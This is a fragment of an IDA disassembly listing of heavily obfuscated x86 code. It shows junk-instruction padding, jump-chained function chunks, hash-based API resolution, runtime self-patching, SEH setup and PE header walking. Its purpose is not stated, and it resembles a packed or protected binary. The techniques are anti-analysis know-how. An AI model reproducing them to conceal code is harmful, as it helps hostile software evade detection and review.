; FUNCTION CHUNK AT 0044C814 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C8B3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453DE1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00454881 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 004584BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458522 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045A09E SIZE 00000005 BYTES

		push	ebp
		push	esi
		push	1B79388Ah
		pop	esi
		xor	esi, 0E3D5376Ch
		test	esi, 10000000h
		jmp	loc_4584BC
sub_43EEC6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB9B

loc_43EEDF:				; CODE XREF: sub_43FB9B+10CD9j
		cmp	ax, 0A5B3h
		jnz	loc_450864

locret_43EEE9:				; CODE XREF: k2vbe3.d:00448363j
		retn
; ---------------------------------------------------------------------------

loc_43EEEA:				; CODE XREF: sub_43FB9B:loc_450864j
		sub	ebx, 10000h
		mov	eax, [ebx]
		neg	eax
		jmp	loc_44859B
; END OF FUNCTION CHUNK	FOR sub_43FB9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_43EEF9:				; CODE XREF: sub_444EFA-677Bj
					; sub_44DB59:loc_45001Aj
		jl	loc_4583BD

loc_43EEFF:				; CODE XREF: sub_43E88E+10D6Bj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF14

loc_43EF04:				; CODE XREF: sub_44CF14+Cj
		jmp	loc_45ADD1
; END OF FUNCTION CHUNK	FOR sub_44CF14
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_43EF09:				; CODE XREF: sub_441D41+3j
		jmp	loc_44B76D
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
		shr	esi, 11h
		xor	ebx, esi
		jmp	loc_4583BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_43EF18:				; CODE XREF: sub_43CCD0:loc_451B08j
		jz	loc_4556D8
		jmp	loc_456D9B
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43EF23:				; CODE XREF: sub_44B94B+8DC3j
		jg	loc_449AC5
		push	3DA28C3Bh
; END OF FUNCTION CHUNK	FOR sub_44B94B
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_43EF2E:				; CODE XREF: sub_4553CC-1798Aj
					; sub_44B94B:loc_44020Ej ...
		jo	loc_43FC91
		cmp	dword ptr [ebp-4], 7
		jnz	loc_445384
		jmp	loc_453BDD
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_43EF43:				; DATA XREF: sub_449A11+7o
		push	eax
		jo	loc_44F9CB
		and	ebx, eax
		ror	ecx, 0Eh
		push	ebx
		jmp	loc_45414A
; ---------------------------------------------------------------------------
		pop	ecx
		push	8C06DA0Fh
		jmp	sub_452255
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_43EF60:				; CODE XREF: sub_454E69-A0A0j
		add	eax, [ebp-0Ch]
		mov	[ebp-1Ch], eax
		mov	eax, [ebp-1Ch]
		call	sub_449E5F
; END OF FUNCTION CHUNK	FOR sub_454E69
; START	OF FUNCTION CHUNK FOR sub_444966

loc_43EF6E:				; CODE XREF: sub_444966+2829j
		popf
		push	87587B9Ch
		xor	eax, ecx
		and	edi, ecx
		jmp	loc_454427
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454BCE

loc_43EF7D:				; CODE XREF: sub_454BCE+11j
		pop	edi
		push	offset sub_45024C
		jmp	loc_441223
; END OF FUNCTION CHUNK	FOR sub_454BCE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_43EF88:				; CODE XREF: sub_4570C0:loc_45BF7Bj
		push	eax
		ror	eax, 15h
		mov	ds:dword_43FA90, eax

locret_43EF92:				; CODE XREF: k2vbe3.d:0044BA59j
		retn
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_43EF93:				; CODE XREF: sub_441D41+17A52j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------

loc_43EF98:				; CODE XREF: k2vbe3.d:0044E7A2j
		jmp	loc_4589D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_43EF9D:				; CODE XREF: sub_4570C0-14C02j
					; sub_4570C0-1981j
		rol	eax, 15h
		push	eax
		push	edx
		push	0CFE4C754h
		jmp	loc_454045
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_43EFAC:				; CODE XREF: sub_448B5E:loc_450F3Aj
		or	eax, 3DE31A87h
		and	eax, ds:4000E8h
		or	eax, 652F7047h
		add	eax, 9A961FCCh
		jmp	loc_4593B2
; END OF FUNCTION CHUNK	FOR sub_448B5E

; =============== S U B	R O U T	I N E =======================================



sub_43EFC9	proc near		; DATA XREF: sub_44A79B+Co

; FUNCTION CHUNK AT 0043F7ED SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043FD32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FF10 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A121 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451DBD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F6E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004535DE SIZE 0000000E BYTES

		xchg	ecx, [esp+0]
		mov	ebp, ecx
		pop	ecx
		push	1BEF12DDh
		pop	eax
		jmp	loc_452F6E
sub_43EFC9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43EFDA	proc near		; CODE XREF: k2vbe3.d:0044398Dj
					; sub_44B999:loc_44C9FAp

; FUNCTION CHUNK AT 004490CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CFF8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E5D1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004548E6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004599A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459A48 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		jmp	loc_4490CD
sub_43EFDA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_43EFE3:				; CODE XREF: sub_44B999+2E3Cj
					; sub_45A323-8208j
		pop	ecx
		jmp	loc_44367C
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------

loc_43EFE9:				; CODE XREF: k2vbe3.d:0043C44Dj
		call	sub_44A7C2
		mov	eax, 11E35Ch
		call	sub_4553CC
		mov	ds:dword_41E128, eax
		lea	eax, nullsub_475
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F1BA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_169. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED1F

loc_43F00D:				; CODE XREF: sub_43ED1F:loc_442846j
		and	eax, 482CFA6Bh
		call	sub_452255

loc_43F018:				; CODE XREF: sub_449067+6607j
		jmp	loc_4584EE
; END OF FUNCTION CHUNK	FOR sub_43ED1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_43F01D:				; CODE XREF: sub_448D7F+4A23j
		jmp	loc_43EA7E
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_43F022:				; CODE XREF: sub_4467A1-4A8Bj
		jmp	loc_450DF3
; END OF FUNCTION CHUNK	FOR sub_4467A1

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_43F027	proc near		; DATA XREF: sub_43D023:loc_44266Bo
		jmp	loc_4490BC
sub_43F027	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F37

loc_43F02C:				; CODE XREF: sub_43D023+9B36j
					; sub_458F37+7j
		call	sub_440543

loc_43F031:				; CODE XREF: k2vbe3.d:0044A487j
		jmp	nullsub_7
; END OF FUNCTION CHUNK	FOR sub_458F37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_43F036:				; CODE XREF: sub_450F71+AB82j
		jz	loc_454002
		jmp	sub_456471
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_43F041:				; CODE XREF: sub_45A9B3:loc_4460B3j
		sub	ebx, 34939045h
		add	ebx, 923D42FAh
		sub	ebx, 9B1B288Bh
		add	ebx, 27892AFFh
		sub	eax, ebx
		jmp	loc_453161
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------

loc_43F060:				; CODE XREF: k2vbe3.d:00457936j
		mov	ebp, esp
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		push	ecx
		jmp	loc_450188
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_43F06E:				; CODE XREF: sub_453347:loc_455585j
		push	eax
		mov	eax, esp
		push	0
; END OF FUNCTION CHUNK	FOR sub_453347
; START	OF FUNCTION CHUNK FOR sub_455B26

loc_43F073:				; CODE XREF: sub_455B26+4j
		mov	edx, esp
		push	edx
		push	0
		jmp	loc_43F9A4
; END OF FUNCTION CHUNK	FOR sub_455B26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_43F07D:				; CODE XREF: sub_44ED3C+9590j
		add	ebx, 6954AF38h
		rol	eax, 9
		jz	loc_44065A
		jo	loc_44D521
		jmp	loc_451148
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_43F097:				; CODE XREF: sub_449372-7625j
		js	loc_43FB2B
		jmp	loc_4465FA
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43F0A2:				; CODE XREF: sub_44B94B:loc_45571Bj
		cmp	dword ptr [ebp-4], 5
		jnz	loc_4465FA
		jmp	loc_43E32E
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_43F0B1:				; CODE XREF: k2vbe3.d:00443BC9j
		pushf
		xchg	ebx, [edx]
		jnp	loc_45322D
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_43F0BA:				; CODE XREF: sub_4529E2:loc_443BB1j
		add	eax, 43AC2F41h
		jmp	loc_4438A3
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_43F0C5:				; CODE XREF: sub_44B94B+50A0j
		sbb	esi, ebp
		or	edx, ebp

loc_43F0C9:				; CODE XREF: sub_44B94B:loc_44D07Bj
		lea	eax, [ebp-26Fh]
		cmp	dword ptr [eax], 47424454h
		jz	loc_44DE55
		jmp	loc_44020E
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_43F0E0:				; CODE XREF: sub_43EEC6:loc_447DF3j
		rol	eax, 1
		sub	eax, 0E5B4581Dh
		xor	eax, 0F6B39F0h
		add	eax, ebp
		push	esi
		push	4E66AC02h
		pop	esi
		rol	esi, 8
		jmp	loc_45A09E
; END OF FUNCTION CHUNK	FOR sub_43EEC6

; =============== S U B	R O U T	I N E =======================================



sub_43F0FF	proc near		; CODE XREF: k2vbe3.d:00447784p
					; k2vbe3.d:00450583j
		xchg	esi, [esp+0]
		pop	esi
		push	ebx
		push	4D34D30Ah

loc_43F109:				; CODE XREF: k2vbe3.d:0044A36Fj
		pop	ebx
		rol	ebx, 0Dh
		add	ebx, 65E31586h
		xchg	ebx, [esp+0]
		jmp	sub_4508A3
sub_43F0FF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45775D

loc_43F11B:				; CODE XREF: sub_45775D+1j
		push	0D13BEA28h
		pop	ecx
		or	ecx, 0C4E3E164h
		cmp	ecx, 722C6F8h
		jmp	loc_456B62
; END OF FUNCTION CHUNK	FOR sub_45775D
; ---------------------------------------------------------------------------
		sbb	ecx, 0E5CD5554h
		jmp	loc_444989
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_43F13D:				; CODE XREF: sub_456541-11324j
		pop	ecx
		shl	eax, 3
		mov	edx, [ebp+8]
		or	[edx-8], eax
		jmp	loc_443902
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
		add	eax, 0F4578987h
		pop	eax
		jmp	sub_4521CB
; ---------------------------------------------------------------------------
		popf
		jmp	loc_44A678
; ---------------------------------------------------------------------------

loc_43F15E:				; CODE XREF: k2vbe3.d:0043D1B8j
		js	loc_446461
		xor	edi, edx
		pushf
		jmp	loc_44BF10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442700

loc_43F16C:				; CODE XREF: sub_442700+124F4j
		add	edi, 1BF7C55Bh

loc_43F172:				; CODE XREF: k2vbe3.d:00455A74j
		mov	[edi], eax
		pop	edi
		push	offset loc_43D518
		jmp	loc_445EF2
; END OF FUNCTION CHUNK	FOR sub_442700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_43F17F:				; CODE XREF: sub_44E00F:loc_459233j
		and	esi, 311EF9BFh
		or	esi, 4A7D5BBAh
		cmp	esi, 51A3564Ah
		jmp	loc_4441B1
; END OF FUNCTION CHUNK	FOR sub_44E00F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_43F196:				; CODE XREF: sub_448D7F:loc_43E9C0j
		jz	loc_458992
; END OF FUNCTION CHUNK	FOR sub_448D7F
; START	OF FUNCTION CHUNK FOR sub_449067

loc_43F19C:				; CODE XREF: sub_449067+BCE0j
		jmp	loc_44F39D
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444144

loc_43F1A1:				; CODE XREF: sub_444144+8553j
		jmp	loc_45919D
; END OF FUNCTION CHUNK	FOR sub_444144
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_43F1A6:				; CODE XREF: sub_4481FA-9CC8j
		jmp	sub_451CCE
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
		sub	edx, ebp
		not	eax
		jmp	loc_458989
; ---------------------------------------------------------------------------

loc_43F1B4:				; CODE XREF: k2vbe3.d:loc_44500Fj
		jz	loc_453500

loc_43F1BA:				; CODE XREF: k2vbe3.d:0043F007j
		jmp	nullsub_475
; ---------------------------------------------------------------------------
		cmp	eax, 216B289Dh
		jmp	loc_4534F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_43F1CA:				; CODE XREF: sub_457DCA-1360Ej
		and	ecx, 8FC8444Fh
		sub	edi, 4B32E8A3h
		adc	edi, eax

loc_43F1D8:				; CODE XREF: sub_457DCA:loc_447E58j
		push	4C23BE6h
		jmp	loc_441271
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4537B7
		jmp	loc_457E79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_43F1EF:				; CODE XREF: sub_4424CF+4j
		mov	ebx, ecx
		xchg	ebx, [esp+0]
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_458BFC
		or	eax, eax
		jnz	loc_44CA05
		jmp	loc_44DBF7
; END OF FUNCTION CHUNK	FOR sub_4424CF

; =============== S U B	R O U T	I N E =======================================



sub_43F20A	proc near		; DATA XREF: sub_43E7A9+8o
		xchg	ebp, [esp+0]
		mov	edx, ebp
		pop	ebp
		push	offset loc_4400A0
		jmp	nullsub_439
sub_43F20A	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_43F21A:				; CODE XREF: sub_449372-AC3Aj
					; sub_43CCD0+B1A5j
		jbe	loc_44F7E2

loc_43F220:				; CODE XREF: sub_44B912:loc_4545D8j
		push	0EA2ED4Fh
		pop	eax
		rol	eax, 9
		jmp	loc_449301
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_43F22E:				; CODE XREF: sub_44DD31-F037j
		push	offset loc_43DB51
		jmp	loc_4501F0
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449312

loc_43F238:				; CODE XREF: sub_449312-CDF9j
		sbb	esi, 0A4CCE81Ch
		test	edx, 3460E871h
		jmp	loc_45719C
; END OF FUNCTION CHUNK	FOR sub_449312
; ---------------------------------------------------------------------------
		jl	loc_45A721
		sbb	edi, ebx
		jmp	sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_43F256:				; CODE XREF: sub_44E0F6+6396j
		push	2
		push	0
		push	0
		push	0D53A9A32h
		jmp	loc_4425C7
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_506. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD44

loc_43F267:				; CODE XREF: sub_44AD44+Ej
		jmp	loc_44CDBF
; END OF FUNCTION CHUNK	FOR sub_44AD44

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43F26C	proc near		; CODE XREF: sub_4437D3+129CAp
					; sub_453347+75FAp

var_14		= dword	ptr -14h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D3AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DAE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004483EF SIZE 00000014 BYTES

		push	ebp
		mov	ebp, esp
		call	sub_4468FE

loc_43F274:				; CODE XREF: sub_44D391+Dj
		jmp	loc_4483EF
sub_43F26C	endp

; ---------------------------------------------------------------------------

loc_43F279:				; CODE XREF: k2vbe3.d:0044BBE0j
		jmp	sub_44B4E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4500BB

loc_43F27E:				; CODE XREF: sub_4500BB-C25Cj
		jmp	nullsub_399
; END OF FUNCTION CHUNK	FOR sub_4500BB
; ---------------------------------------------------------------------------

loc_43F283:				; CODE XREF: k2vbe3.d:00452037j
		xor	eax, edx
		jmp	loc_4598B4
; ---------------------------------------------------------------------------

locret_43F28A:				; CODE XREF: k2vbe3.d:loc_43EC6Dj
		retn
; ---------------------------------------------------------------------------
		add	edi, ebp
		jmp	sub_444B65
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43F292:				; CODE XREF: sub_44C90E:loc_454D1Ej
		cmp	dword ptr [ebp-10Ch], 36343831h
		jnz	loc_444C96
		jmp	loc_450879
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454639

loc_43F2A7:				; CODE XREF: sub_454639+3EE4j
		jnz	loc_43CF83

loc_43F2AD:				; CODE XREF: k2vbe3.d:0045AE0Ej
		jmp	loc_45A3B9
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45244A

loc_43F2B2:				; CODE XREF: sub_45244A+Ej
		jmp	loc_4524B8
; END OF FUNCTION CHUNK	FOR sub_45244A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575DF

loc_43F2B7:				; CODE XREF: sub_4575DF-11641j
		jmp	nullsub_539
; END OF FUNCTION CHUNK	FOR sub_4575DF
; ---------------------------------------------------------------------------
		test	eax, 3A9A5166h
		jmp	loc_4465E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_43F2C7:				; CODE XREF: sub_4443DD+Dj
		mov	ebp, eax

loc_43F2C9:				; CODE XREF: k2vbe3.d:00449F41j
		xchg	ebp, [esp+8+var_8]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0Ch+var_C]
		mov	edx, eax
		push	edi
		mov	edi, ecx
		jmp	loc_440CD3
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------

loc_43F2DC:				; CODE XREF: k2vbe3.d:0045B2F6j
		pop	eax
		pop	ecx
		pop	ebp
		retn

; =============== S U B	R O U T	I N E =======================================



sub_43F2E0	proc near		; CODE XREF: sub_457D4B:loc_43C352j
					; sub_45B20A:loc_44E2D2p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C088 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F9B5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043FF2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441600 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044306C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00444837 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445093 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00447EED SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00454845 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454D68 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045780C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B702 SIZE 00000008 BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		jmp	loc_454D68
sub_43F2E0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_43F2F3:				; CODE XREF: sub_4467A1:loc_444961j
		jz	loc_45569D
		jmp	loc_44AA15
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
		add	ecx, edi
		pop	edi
		jmp	sub_45724E
; ---------------------------------------------------------------------------

loc_43F306:				; CODE XREF: k2vbe3.d:loc_45264Cj
		xor	eax, 930B1649h
		mov	edx, [esp]
		push	eax
		mov	eax, edx
		call	sub_442D04
		jmp	loc_4484BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C82E

loc_43F31C:				; CODE XREF: sub_43C82E+19EFj
		jz	sub_4443DD
		jmp	loc_448665
; END OF FUNCTION CHUNK	FOR sub_43C82E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_461. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_43F328:				; CODE XREF: sub_43D7A9+103F5j
		jmp	nullsub_425
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------

loc_43F32D:				; CODE XREF: k2vbe3.d:0043D483j
		jp	loc_44DA25

loc_43F333:				; CODE XREF: k2vbe3.d:loc_4443F6j
		add	esi, 7E34BBB1h
		mov	[esi], eax
		pop	esi
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_43F33D:				; CODE XREF: sub_440C94+1ACABj
		jmp	sub_43E0F5
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_43F342:				; CODE XREF: sub_444B3E+BF89j
		jmp	loc_448872
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

loc_43F347:				; CODE XREF: k2vbe3.d:0044A698j
		jmp	loc_457386

; =============== S U B	R O U T	I N E =======================================



sub_43F34C	proc near		; CODE XREF: k2vbe3.d:004523E1j
					; sub_454E83+3821p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C1B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DC2A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004400C9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440B84 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00441D1B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00443111 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443ED7 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00449A2D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AADB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DEE9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004534A2 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454501 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454CE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045975C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A804 SIZE 00000007 BYTES

		xchg	edi, [esp+0]
		pop	edi
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_45975C
		jmp	loc_43C1B4
sub_43F34C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43F364	proc near		; DATA XREF: sub_43DFE1:loc_456412o

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043E269 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004429DB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447FD0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449511 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AD01 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DA1D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F0AB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450F4D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458CC7 SIZE 0000000B BYTES

		push	5DD8555Fh
		pop	edx
		rol	edx, 14h
		jb	loc_44F0AD
		sub	eax, 0CC569C50h
		jmp	loc_44DA1D
sub_43F364	endp

; ---------------------------------------------------------------------------

loc_43F37E:				; CODE XREF: k2vbe3.d:loc_452736j
					; k2vbe3.d:0045275Dj
		add	ebx, 37C062E2h
		xchg	ebx, [esp]
		jmp	loc_44D7D2
; ---------------------------------------------------------------------------

locret_43F38C:				; CODE XREF: k2vbe3.d:loc_43CBDEj
		retn
; ---------------------------------------------------------------------------
		xchg	eax, [edi]
		jmp	sub_4541EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_43F394:				; CODE XREF: sub_448159-63E6j
		sub	edx, 0D8885E8Bh
		xor	edx, 6BEB6E58h
		call	sub_45B20A
		push	eax
		ror	eax, 11h
		push	esi
		push	0E5CDD4EAh

loc_43F3AF:				; CODE XREF: sub_44D59D:loc_45208Bj
		pop	esi
		jmp	loc_44917B
; END OF FUNCTION CHUNK	FOR sub_448159
; ---------------------------------------------------------------------------

loc_43F3B5:				; CODE XREF: k2vbe3.d:00456ED0j
		ror	edx, 1Bh
		not	ecx
		popf

loc_43F3BB:				; CODE XREF: k2vbe3.d:00456EC1j
		xor	ebx, 874F5CA0h
		or	ebx, 51F3EE96h
		add	ebx, 8A45F0F6h
		call	sub_44364F
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_43F3D2:				; CODE XREF: sub_44D9A7+56E1j
		jmp	loc_448944
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------

loc_43F3D7:				; CODE XREF: k2vbe3.d:0043D291j
		jmp	loc_4562D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D244

loc_43F3DC:				; CODE XREF: sub_43D244:loc_44E56Cj
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		push	3040B9FDh
		pop	edx
		xor	edx, 7B488C07h
		jmp	loc_45A176
; END OF FUNCTION CHUNK	FOR sub_43D244
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_43F3F2:				; CODE XREF: sub_448DD4-1724j
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h

loc_43F3FA:				; CODE XREF: sub_448DD4:loc_44913Fj
		mov	[ebp-10h], eax
		mov	eax, [ebp-10h]
		mov	eax, [eax+60h]
		add	eax, [ebp-4]
		mov	[ebp-14h], eax
		jmp	loc_4598C8
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_43F40E:				; CODE XREF: sub_44662B+2F23j
		add	eax, ebp
		push	esi
		push	0B0F62B3Dh
		pop	esi
		sub	esi, 83209835h
		jmp	loc_4503C0
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		call	sub_443A95
		mov	eax, 24CC2B1h
		call	sub_4553CC
		mov	ds:dword_41E194, eax
